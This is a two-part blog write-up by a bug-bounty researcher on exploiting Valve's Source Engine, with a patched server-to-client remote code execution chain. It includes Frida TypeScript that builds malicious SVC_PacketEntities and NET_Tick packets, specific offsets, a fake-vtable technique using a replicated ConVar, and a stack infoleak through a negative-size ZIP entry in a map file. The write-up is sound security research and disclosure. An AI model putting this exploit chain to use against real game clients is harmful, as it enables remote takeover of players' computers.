Normal view

There are new articles available, click to refresh the page.

Before yesterdayReversing Engineering for the Soul

Exploiting the Source Engine (Part 1)

2 August 2018 at 00:00

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got involved obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post made about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit was very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kind of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.


Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third generation derivative of the famous Quake Engine from 1999 and the Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series’ in history, including Half-Life, Team Fortress, Portal, and Counter Strike.

Timeline:

1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
2004 - Valve releases the Source Engine based on GoldSrc.
2007 - The source code to the Source Engine is leaked.
2012 - CS:GO is released, and with it, “Source 1.5” begins development.
2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for their current engine versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consists of two separate parts, the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main parts, client.dll and server.dll. These binaries contain the compiled game that will use the engine. Both of these dlls will utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where its run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and custom formats is fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

32-bit binaries
NX - Enabled
Full ASLR - Enabled (recently)
Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a vital shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why this is not enabled (most likely performance or build breaking issues), but regardless, there is a huge point to make: Any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different than you would find in a beginner level CTF challenge. But, unlike the CTF, its implications of a full client machine compromise in a series of games with a huge player base leads to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

Following code structure and searches using Visual Studio with Resharper++.
Cmder (with grep) to search for patterns.
IDA Pro to prove the existence of the bug in the newest build.
WinDbg and x64dbg to attach to the game and try to trigger the bug.
Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

Find some section of the client code I feel is exploitable and want to look into more closely
Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.
From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.
If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.
Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the service. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps

Reversing Engineering for the Soul
Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida
1 May 2021 at 00:00

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Reversing Engineering for the Soul

1 May 2021 at 00:00

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

Client connects to server
Server exploits stack-based buffer overflow in the client
Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

Arbitrary relative pointer writes to pointers in global queryable objects
Heap overflows against a queryable object to cause controllable pointer writes
Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
The exploit must produce its own pointer leak, or chain another bug to infoleak
The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
The exploit must have a ~100% stability rate
The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
The code dereferences the first value inside of m_pszString to get the pointer to the vtable
The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA)

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

Servers can cause the client to upload arbitrary files with certain file extensions
Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

